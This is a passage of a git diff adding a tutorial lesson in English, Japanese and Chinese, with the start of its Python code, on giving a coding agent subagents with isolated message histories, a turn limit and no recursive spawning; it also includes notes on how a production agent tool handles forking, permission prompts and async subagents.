+ +--- + +## How It Works + +**spawn_subagent** — gives the sub-Agent a fresh messages list, runs its own loop, returns only the conclusion: + +```python +def spawn_subagent(description: str) -> str: + # Sub-Agent tools: base tools, but no task (no recursion) + sub_tools = [ + {"name": "bash", ...}, {"name": "read_file", ...}, + {"name": "write_file", ...}, {"name": "edit_file", ...}, + {"name": "glob", ...}, + ] + messages = [{"role": "user", "content": description}] # fresh messages[] + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=sub_tools, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + # Return only the final text conclusion — all intermediate steps discarded + return extract_text(messages[-1]["content"]) +``` + +The main Agent calls it just like any other tool: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + {"name": "todo_write", ...}, + # s06: new task tool + {"name": "task", + "description": "Launch a subagent to handle a complex subtask. 
Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, +] + +TOOL_HANDLERS["task"] = spawn_subagent +``` + +Three key design decisions: + +| Decision | Choice | Reason | +|----------|--------|--------| +| Context isolation | Fresh `messages[]` | Sub-Agent's intermediate steps don't pollute main Agent's context | +| Return only conclusion | `extract_text(last_message)` | Not returning the entire messages list | +| No recursion | Sub-Agent has no task tool | Prevents sub-Agent from spawning grandchild Agents | + +The loop doesn't change. The task tool is automatically dispatched through `TOOL_HANDLERS[block.name]`. + +--- + +## Changes from s05 + +| Component | Before (s05) | After (s06) | +|-----------|-------------|-------------| +| Tool count | 6 (bash, read, write, edit, glob, todo_write) | 7 (+task) | +| New function | — | spawn_subagent (independent messages[] + 30-round safety limit) | +| Context isolation | Everything in the main conversation | Sub-Agent uses fresh messages[] | +| Loop | Unchanged | Unchanged (task tool auto-dispatched) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s06_subagent/code.py +``` + +Try these prompts: + +1. `Use a subtask to find what testing framework this project uses` (sub-Agent reads files, main Agent receives only the conclusion) +2. `Delegate: read all .py files in agents/ and summarize what each one does` +3. `Use a task to create a new module, then verify it from here` + +What to watch for: Does the Agent spawn a sub-Agent to read files? Do the sub-Agent's intermediate steps appear in the main conversation? Does the final conclusion include the file contents that the sub-Agent read? + +--- + +## What's Next + +The Agent can now break tasks apart. But different tasks require different knowledge — editing frontend components needs React conventions, writing SQL needs table schemas. 
Stuffing all this knowledge into the system prompt would blow up the context. + +→ s07 Skill Loading: Inject skills on demand instead of piling documents into the system prompt. Load only when needed, as natural as reading a file. + +
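
One helper in the `spawn_subagent` listing above, `extract_text`, is referenced but never defined. A minimal version consistent with how it's used (pull the text blocks out of the sub-Agent's final message, drop everything else) might be:

```python
def extract_text(content) -> str:
    """Join the text blocks of a message's content; drop tool_use and the rest."""
    if isinstance(content, str):
        return content
    parts = []
    for block in content:
        if isinstance(block, dict):
            if block.get("type") == "text":
                parts.append(block.get("text", ""))
        elif getattr(block, "type", None) == "text":
            # SDK content blocks are objects, not dicts
            parts.append(block.text)
    return "\n".join(parts) or "(subagent returned no text)"
```

This is where the isolation guarantee is enforced in practice: whatever the sub-Agent read or ran, only this joined text crosses back into the main `messages[]`.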
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `AgentTool.tsx`, `runAgent.ts`, `forkSubagent.ts`, and `forkedAgent.ts`. + +### 1. Not One Pattern, but Three + +The teaching version covers only "fresh messages[]". CC actually has three execution modes: + +| Mode | Trigger | Context | +|------|---------|---------| +| **Normal Subagent** | `subagent_type` specified | **Truly fresh messages[]** — only the prompt | +| **Fork Subagent** | No `subagent_type`, fork gate enabled | **Inherits parent Agent's full messages** — shares prompt cache | +| **General-Purpose** | No `subagent_type`, fork gate disabled | Same as Normal | + +### 2. Fork Mode: Sharing Prompt Cache + +This is a core concept the teaching version omits. Fork mode (`forkSubagent.ts:60-71`) doesn't create a fresh context — it **inherits the parent Agent's message history**. The goal isn't isolation, but **making the Anthropic API's prompt cache hit** — parent and child Agent's system prompt, tools, and message prefix are byte-identical, so the API doesn't need to recompute. + +Five key components for cache hit (`forkedAgent.ts:57-68`): system prompt, tools, model, message prefix, thinking config — must be byte-identical. + +### 3. Context Isolation's Precise Granularity + +`createSubagentContext()` (`forkedAgent.ts:345-462`) creates the sub-Agent's `ToolUseContext`: + +| Field | Behavior | +|-------|----------| +| `abortController` | New child controller; parent abort propagates down | +| `setAppState` | **no-op** (sub-Agent can't modify parent UI) | +| `readFileState` | **Cloned from parent** (avoids re-reading same files) | +| `queryTracking` | New chainId, `depth = parentDepth + 1` | + +The sub-Agent isn't fully isolated — file read state is shared, but UI and notifications are completely blocked. + +### 4. 
Recursive Fork Protection + +CC explicitly prevents sub-Agents from spawning grandchild Agents — `isInForkChild()` (`forkSubagent.ts:78-89`) checks the conversation history for `FORK_BOILERPLATE_TAG` and refuses if found. + +### 5. Permission Bubbling + +Fork Agent's `permissionMode: 'bubble'` (`forkSubagent.ts:67`) means the sub-Agent's permission prompts **bubble up to the parent terminal** — the user approves sub-Agent operations in the main terminal. + +### 6. Async vs Sync + +The teaching version only shows synchronous sub-Agents (parent waits for child to finish). CC also supports async paths (`AgentTool.tsx:686-764`): when `run_in_background: true`, the sub-Agent launches asynchronously, returning `{ status: 'async_launched' }` immediately to the parent, and notifies the parent when complete. + +### Teaching Version Simplifications Are Intentional + +- Three modes → one (fresh messages): conceptually clear +- Prompt cache sharing → omitted: teaching version doesn't involve API-layer optimization +- Recursive fork protection → simplified to "sub-Agent has no task tool" +- Async → omitted (left for s13): s06 focuses on the synchronous model first + +
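
The guard from point 4 can be sketched as follows. The tag value and message shapes here are illustrative assumptions; CC's actual check lives in `forkSubagent.ts:78-89`:

```python
FORK_BOILERPLATE_TAG = "<fork-boilerplate>"  # illustrative placeholder value

def is_in_fork_child(messages: list) -> bool:
    """Refuse nested forks: scan the conversation history for the fork marker."""
    for m in messages:
        content = m.get("content", "")
        if isinstance(content, list):
            # flatten block lists so the marker is found wherever it appears
            content = " ".join(str(b) for b in content)
        if FORK_BOILERPLATE_TAG in str(content):
            return True
    return False
```

Same intent as the teaching version's "sub-Agent has no task tool", but enforced by inspecting the history rather than by restricting the tool list.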
+ + diff --git a/s06_subagent/README.ja.md b/s06_subagent/README.ja.md new file mode 100644 index 000000000..84ed5f1c8 --- /dev/null +++ b/s06_subagent/README.ja.md @@ -0,0 +1,188 @@ +# s06: Subagent — 大きなタスクを分割、それぞれがクリーンなコンテキストを取得 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → `s06` → [s07](../s07_skill_loading/) → s08 → ... → s19 + +> *"大きなタスクは小さく、小さなタスクごとにクリーンなコンテキスト"* — Subagent は独立した messages[] を使い、メイン会話を汚染しない。 +> +> **Harness レイヤー**: サブエージェント — コンテキストの隔離、注意の散漫を防ぐ。 + +--- + +## 課題 + +Agent がバグを修正している。呼び出しチェーンを追跡するために 30 のファイルを読み、途中で 60 ラウンドやり取りした。messages リストは 120 件に膨らみ、その大部分は「呼び出しチェーンの追跡」という中間過程 — 「バグ修正」という最終目標とは無関係。 + +この中間過程がコンテキストの席を占め、Agent はますます「健忘」になる — 最初の問題が何だったか覚えていられない。 + +別の見方をすると:バグを修正するとき、あなたは「新しいターミナルを開いて」呼び出しチェーンを追跡するだろう。追跡が終わったらターミナルを閉じ、結果をメモに書き、元のターミナルに戻ってバグ修正を続ける。Agent にもこの能力が必要 — **独立したサブプロセスを開き、独立したメッセージリストを与え、一つのことに集中させる。** + +--- + +## ソリューション + +![Subagent Overview](images/subagent-overview.ja.svg) + +s05 のループ、フック、TODO システムは完全に保持される。唯一の変更は TOOL_HANDLERS にもう一つツールを登録すること:`task`。呼び出されると、サブエージェントを spawn する — 新しい `messages[]` を持ち、自分自身のループを実行し、終了後に要約テキストのみをメイン Agent に返す。中間過程はすべて破棄される。 + +サブエージェントのツールは制限される:bash/read/write/edit/glob を持つが、**task はない** — 孫エージェントの再帰的 spawn を禁止。 + +--- + +## 仕組み + +**spawn_subagent** — サブエージェントに新しいメッセージリストを与え、自分自身のループを実行し、結論のみを返す: + +```python +def spawn_subagent(description: str) -> str: + # サブエージェントのツール:基本ツールのみ、task なし(再帰禁止) + sub_tools = [ + {"name": "bash", ...}, {"name": "read_file", ...}, + {"name": "write_file", ...}, {"name": "edit_file", ...}, + {"name": "glob", ...}, + ] + messages = [{"role": "user", "content": description}] # 新規 messages[] + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=sub_tools, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in 
response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + # 最後のテキスト結論のみを返す — 中間過程はすべて破棄 + return extract_text(messages[-1]["content"]) +``` + +メイン Agent の呼び出しは、他のツールと同じ: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + {"name": "todo_write", ...}, + # s06: 新規 task ツール + {"name": "task", + "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, +] + +TOOL_HANDLERS["task"] = spawn_subagent +``` + +三つの重要な設計決定: + +| 決定 | 選択 | 理由 | +|------|------|------| +| コンテキスト隔離 | 新規 `messages[]` | サブエージェントの中間過程がメイン Agent のコンテキストを汚染しない | +| 結論のみ返却 | `extract_text(last_message)` | messages リスト全体を返すのではない | +| 再帰禁止 | サブエージェントに task ツールなし | サブエージェントが孫エージェントを spawn するのを防止 | + +ループは一行も変わらない。task ツールは `TOOL_HANDLERS[block.name]` を通じて自動的にディスパッチされる。 + +--- + +## s05 からの変更 + +| コンポーネント | 変更前 (s05) | 変更後 (s06) | +|--------------|-------------|-------------| +| ツール数 | 6 (bash, read, write, edit, glob, todo_write) | 7 (+task) | +| 新規関数 | — | spawn_subagent(独立 messages[] + 30 ラウンド安全制限) | +| コンテキスト隔離 | すべてメイン会話内 | サブエージェントが新規 messages[] を使用 | +| ループ | 不変 | 不変(task ツールは自動ディスパッチ) | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s06_subagent/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Use a subtask to find what testing framework this project uses`(サブエージェントがファイルを読み、メイン Agent は結論のみ受け取る) +2. `Delegate: read all .py files in agents/ and summarize what each one does` +3. 
`Use a task to create a new module, then verify it from here` + +観察のポイント:Agent はサブエージェントを spawn してファイルを読みに行くか? サブエージェントの中間過程はメイン会話に現れるか? 最後に返された結論に、サブエージェントが読んだファイルの内容は含まれているか? + +--- + +## 次へ + +Agent はタスクを分割できるようになった。しかし各タスクに必要な知識は異なる — フロントエンドコンポーネントの変更には React 規約が必要で、SQL を書くにはテーブル構造を知る必要がある。これらの知識をすべて system prompt に詰め込むと、コンテキストが溢れてしまう。 + +→ s07 Skill Loading:スキルをオンデマンドで注入する。system prompt にドキュメントを積み上げるのではなく、必要なときだけ読み込む。ファイルを読むのと同じくらい自然に。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `AgentTool.tsx`、`runAgent.ts`、`forkSubagent.ts`、`forkedAgent.ts` の完全分析に基づく。 + +### 一、一つのパターンではなく三つ + +教育版は「新規 messages[]」のみを取り上げる。CC には実際に三つの実行モードがある: + +| モード | トリガー | コンテキスト | +|--------|---------|-------------| +| **Normal Subagent** | `subagent_type` 指定時 | **真の新規 messages[]** — プロンプトのみ | +| **Fork Subagent** | `subagent_type` 未指定、fork gate 有効時 | **親 Agent の全 messages を継承** — プロンプトキャッシュを共有 | +| **General-Purpose** | `subagent_type` 未指定、fork gate 無効時 | Normal と同じ | + +### 二、Fork モード:プロンプトキャッシュの共有のため + +これは教育版にはない核心概念。Fork モード(`forkSubagent.ts:60-71`)は新規コンテキストを作成せず、**親 Agent のメッセージ履歴を継承する**。目的は隔離ではなく、**Anthropic API のプロンプトキャッシュをヒットさせること** — 親子 Agent の system prompt、tools、messages プレフィックスがバイトレベルで一致するため、API 側で再計算が不要になる。 + +キャッシュヒットの五つの重要コンポーネント(`forkedAgent.ts:57-68`):system prompt、tools、model、messages プレフィックス、thinking config — バイトレベルで一致する必要がある。 + +### 三、コンテキスト隔離の精密な粒度 + +`createSubagentContext()`(`forkedAgent.ts:345-462`)はサブエージェントの `ToolUseContext` を作成: + +| フィールド | 挙動 | +|-----------|------| +| `abortController` | 新しい子コントローラ、親の abort は下に伝播 | +| `setAppState` | **no-op**(サブエージェントは親 UI を変更不可) | +| `readFileState` | **親からクローン**(同じファイルの再読み込みを回避) | +| `queryTracking` | 新しい chainId、`depth = parentDepth + 1` | + +サブエージェントは完全に隔離されているわけではない — ファイル読み取り状態は共有されるが、UI と通知は完全に遮断される。 + +### 四、再帰 Fork 防護 + +CC はサブエージェントが孫エージェントを spawn するのを明示的に防止 — `isInForkChild()`(`forkSubagent.ts:78-89`)が会話履歴内に `FORK_BOILERPLATE_TAG` があるかチェックし、あれば拒否する。 + +### 五、Permission Bubbling + +Fork Agent の `permissionMode: 'bubble'`(`forkSubagent.ts:67`)は、サブエージェントの権限プロンプトが**親ターミナルにバブルアップ**することを意味する — ユーザーはメインターミナルでサブエージェントの操作を承認する。 + +### 六、Async vs Sync + +教育版は同期サブエージェントのみ(親が子の完了を待つ)を示す。CC は非同期パスもサポート(`AgentTool.tsx:686-764`):`run_in_background: true` の場合、サブエージェントは非同期で起動し、`{ status: 'async_launched' }` を直ちに親に返し、完了時に通知機構で親に知らせる。 + +### 教育版の簡略化は意図的 + +- 三つのモード → 一つ(新規 messages):概念的に明確 +- プロンプトキャッシュ共有 → 省略:教育版は API 層の最適化を扱わない +- 再帰 fork 防護 → 「サブエージェントに task ツールなし」に簡略化 +- 
Async → 省略(s13 に委ねる):s06 はまず同期モデルを理解する + +
+ + diff --git a/s06_subagent/README.md b/s06_subagent/README.md new file mode 100644 index 000000000..2eb89eb3b --- /dev/null +++ b/s06_subagent/README.md @@ -0,0 +1,188 @@ +# s06: Subagent — 大任务拆小,每个拿到的都是干净上下文 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → `s06` → [s07](../s07_skill_loading/) → s08 → ... → s19 + +> *"大任务拆小, 每个小任务干净的上下文"* — Subagent 用独立 messages[], 不污染主对话。 +> +> **Harness 层**: 子 Agent — 上下文隔离, 注意力不漂移。 + +--- + +## 问题 + +Agent 在修一个 bug。它读了 30 个文件来追踪调用链,中间聊了 60 轮。messages 列表涨到 120 条,其中大部分是"追踪调用链"的中间过程——和"修 bug"这个最终目标无关。 + +这些中间过程占着上下文位置,让 Agent 越来越"健忘"——它记不住最初的问题是什么了。 + +换个角度:你修 bug 的时候,会"开一个新终端"来追踪调用链。追踪完了,终端关掉,结果写进笔记,回到原来的终端继续修 bug。Agent 也需要这个能力——**开一个独立的子进程,给它一个独立的消息列表,让它专心做一件事。** + +--- + +## 解决方案 + +![Subagent Overview](images/subagent-overview.svg) + +s05 的循环、钩子、TODO 系统完全保留。唯一的变化是在 TOOL_HANDLERS 里多注册一个 `task` 工具。调用它时,spawn 一个子 Agent——拥有全新的 `messages[]`,跑自己的循环,结束后只把摘要文本回传给主 Agent。中间过程全部丢弃。 + +子 Agent 的工具受限:有 bash/read/write/edit/glob,但**没有 task**——禁止递归 spawn 孙 Agent。 + +--- + +## 工作原理 + +**spawn_subagent**——给子 Agent 一个全新的 messages 列表,跑自己的循环,只回传结论: + +```python +def spawn_subagent(description: str) -> str: + # 子 Agent 的工具:基础工具,但没有 task(禁止递归) + sub_tools = [ + {"name": "bash", ...}, {"name": "read_file", ...}, + {"name": "write_file", ...}, {"name": "edit_file", ...}, + {"name": "glob", ...}, + ] + messages = [{"role": "user", "content": description}] # 全新 messages[] + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=sub_tools, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": 
block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + # 只返回最后的文本结论——中间过程全部丢弃 + return extract_text(messages[-1]["content"]) +``` + +主 Agent 调用时,跟调其他工具一样: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + {"name": "todo_write", ...}, + # s06: 新增 task 工具 + {"name": "task", + "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, +] + +TOOL_HANDLERS["task"] = spawn_subagent +``` + +三个关键设计决策: + +| 决策 | 选择 | 原因 | +|------|------|------| +| 上下文隔离 | 全新 `messages[]` | 子 Agent 的中间过程不污染主 Agent 的上下文 | +| 只回传结论 | `extract_text(last_message)` | 不是回传整个 messages 列表 | +| 禁止递归 | 子 Agent 无 task 工具 | 防止子 Agent 再 spawn 孙 Agent | + +循环一行不改。task 工具自动通过 `TOOL_HANDLERS[block.name]` 分发。 + +--- + +## 相对 s05 的变更 + +| 组件 | 之前 (s05) | 之后 (s06) | +|------|-----------|-----------| +| 工具数量 | 6 (bash, read, write, edit, glob, todo_write) | 7 (+task) | +| 新函数 | — | spawn_subagent(独立 messages[] + 30 轮安全限制) | +| 上下文隔离 | 全部在主对话中 | 子 Agent 用全新的 messages[] | +| 循环 | 不变 | 不变(task 工具自动分发) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s06_subagent/code.py +``` + +试试这些 prompt: + +1. `Use a subtask to find what testing framework this project uses`(子 Agent 去读文件,主 Agent 只收结论) +2. `Delegate: read all .py files in agents/ and summarize what each one does` +3. `Use a task to create a new module, then verify it from here` + +观察重点:Agent 会 spawn 子 Agent 去读文件吗?子 Agent 的中间过程是否出现在主对话中?最后返回的结论包含子 Agent 读的那些文件内容吗? + +--- + +## 接下来 + +Agent 现在能拆任务了。但每个任务需要的知识不一样——改前端组件需要知道 React 规范,写 SQL 需要知道表结构。这些知识全塞进 system prompt,上下文直接爆了。 + +s07 Skill Loading → 技能按需注入,不在 system prompt 里堆文档。用到的时候才加载,和读文件一样自然。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `AgentTool.tsx`、`runAgent.ts`、`forkSubagent.ts`、`forkedAgent.ts` 的完整分析。 + +### 一、不是一种模式,是三种 + +教学版只讲了"全新的 messages[]"。CC 实际有三种执行模式: + +| 模式 | 触发条件 | 上下文 | +|------|---------|--------| +| **Normal Subagent** | 指定了 `subagent_type` | **真正的全新 messages[]**——只有 prompt | +| **Fork Subagent** | 没指定 `subagent_type`,fork gate 开启 | **继承父 Agent 的全部 messages**——共享 prompt cache | +| **General-Purpose** | 没指定 `subagent_type`,fork gate 关闭 | 同 Normal | + +### 二、Fork 模式:为了共享 Prompt Cache + +这是教学版没有的核心概念。Fork 模式(`forkSubagent.ts:60-71`)不创建全新上下文,而是**继承父 Agent 的消息历史**。目的不是隔离,而是**让 Anthropic API 的 prompt cache 命中**——父子 Agent 的 system prompt、tools、messages 前缀完全一致,API 端不需要重算。 + +缓存命中的五个关键组件(`forkedAgent.ts:57-68`):system prompt、tools、model、messages 前缀、thinking config——必须字节级一致。 + +### 三、Context Isolation 的精确粒度 + +`createSubagentContext()`(`forkedAgent.ts:345-462`)创建子 Agent 的 `ToolUseContext`: + +| 字段 | 行为 | +|------|------| +| `abortController` | 新的 child controller,父 abort 向下传播 | +| `setAppState` | **no-op**(子 Agent 不能改父 UI) | +| `readFileState` | **从父克隆**(避免重复读相同文件) | +| `queryTracking` | 新 chainId,`depth = parentDepth + 1` | + +子 Agent 不是完全隔离的——文件读取状态是共享的,但 UI 和通知是完全阻断的。 + +### 四、递归 Fork 防护 + +CC 明确防止子 Agent 再 spawn 孙 Agent——`isInForkChild()`(`forkSubagent.ts:78-89`)检查对话历史中是否有 `FORK_BOILERPLATE_TAG`,有就拒绝。 + +### 五、Permission Bubbling + +Fork Agent 的 `permissionMode: 'bubble'`(`forkSubagent.ts:67`)意味着子 Agent 的权限弹窗**冒泡到父终端**——用户在主终端里审批子 Agent 的操作。 + +### 六、Async vs Sync + +教学版只展示了同步子 Agent(父等着子跑完)。CC 还支持异步路径(`AgentTool.tsx:686-764`):`run_in_background: true` 时异步启动,返回 `{ status: 'async_launched' }` 立即给父 Agent,子 Agent 完成后通过通知机制告知父 Agent。 + +### 教学版的简化是刻意的 + +- 三种模式 → 一种(fresh messages):概念清晰 +- Prompt cache 共享 → 省略:教学版不涉及 API 层优化 +- 递归 fork 防护 → 简化为"子 Agent 无 task 工具" +- Async → 省略(留给 s13):s06 先理解同步模型 + +
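上文提到的“五个关键组件必须字节级一致”,可以用几行 Python 做个示意:把五个组件序列化成一个指纹,任何一个字节不同,指纹就变,前缀缓存也就失效。注意这只是概念草图(模型名是占位符),与 Anthropic 服务端真实的前缀缓存实现无关:

```python
import hashlib
import json

def cache_key(system, tools, model, messages_prefix, thinking):
    """把五个缓存命中组件序列化成指纹:任何一个字节不同,指纹就不同。"""
    payload = json.dumps(
        [system, tools, model, messages_prefix, thinking],
        sort_keys=True, ensure_ascii=False,
    )
    return hashlib.sha256(payload.encode()).hexdigest()

# Fork 子 Agent:五个组件与父完全一致 → 前缀可命中缓存
parent = cache_key("You are a coding agent.", [{"name": "bash"}],
                   "model-x", [{"role": "user", "content": "fix bug"}], None)
fork = cache_key("You are a coding agent.", [{"name": "bash"}],
                 "model-x", [{"role": "user", "content": "fix bug"}], None)
# Normal 子 Agent:全新 messages[] → 前缀不同,缓存必然失效
fresh = cache_key("You are a coding agent.", [{"name": "bash"}],
                  "model-x", [], None)
```

这也解释了 Fork 模式的取舍:放弃上下文隔离,换来的是完全相同的请求前缀。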
+ + diff --git a/s06_subagent/code.py b/s06_subagent/code.py new file mode 100644 index 000000000..f7cff5c6e --- /dev/null +++ b/s06_subagent/code.py @@ -0,0 +1,336 @@ +#!/usr/bin/env python3 +""" +s06: Subagent — spawn sub-agents with fresh messages[] for context isolation. + + Parent Agent Subagent + +------------------+ +------------------+ + | messages=[...] | | messages=[task] | <-- fresh + | | dispatch | | + | tool: task | ---------------> | own while loop | + | prompt="..." | | bash/read/... | + | | summary only | (max 30 turns) | + | result = "..." | <--------------- | return last text | + +------------------+ +------------------+ + ^ | + | intermediate results DISCARDED | + +--------------------------------------+ + + Subagent tools: bash, read, write, edit, glob (NO task — no recursion) + +Changes from s05: + + task tool + spawn_subagent() with fresh messages[] + + Safety limit: max 30 turns per subagent + + extract_text() helper + Subagent cannot spawn sub-subagents (no task tool in sub_tools). + Main loop unchanged: task auto-dispatches via TOOL_HANDLERS. + +Run: python s06_subagent/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +TASKS_DIR = WORKDIR / ".tasks"; TASKS_DIR.mkdir(exist_ok=True) +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "For complex sub-problems, use the task tool to spawn a subagent." 
+) + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s05 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + lines = ["\n\033[33m## Current Tasks\033[0m"] + for t in 
todos: + icon = {"pending": " ", "in_progress": "\033[36m▸\033[0m", "completed": "\033[32m✓\033[0m"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" + +def extract_text(content) -> str: + """Extract text from message content blocks.""" + if not isinstance(content, list): + return str(content) + return "\n".join(getattr(b, "text", "") for b in content if getattr(b, "type", None) == "text") + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, + {"name": "todo_write", "description": "Create and manage a task list for your current coding session.", + "input_schema": {"type": "object", "properties": {"todos": {"type": "array", "items": {"type": "object", "properties": {"content": {"type": "string"}, "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}}}}}}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, 
"todo_write": run_todo_write, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s06: Subagent — fresh messages[], summary only +# ═══════════════════════════════════════════════════════════ + +SUB_TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] +# NO "task" tool — prevent recursive spawning + +SUB_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + +def spawn_subagent(description: str) -> str: + """Spawn a subagent with fresh messages[], return summary only.""" + print(f"\n\033[35m[Subagent spawned]\033[0m") + messages = [{"role": "user", "content": description}] # fresh context + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=SUB_TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if 
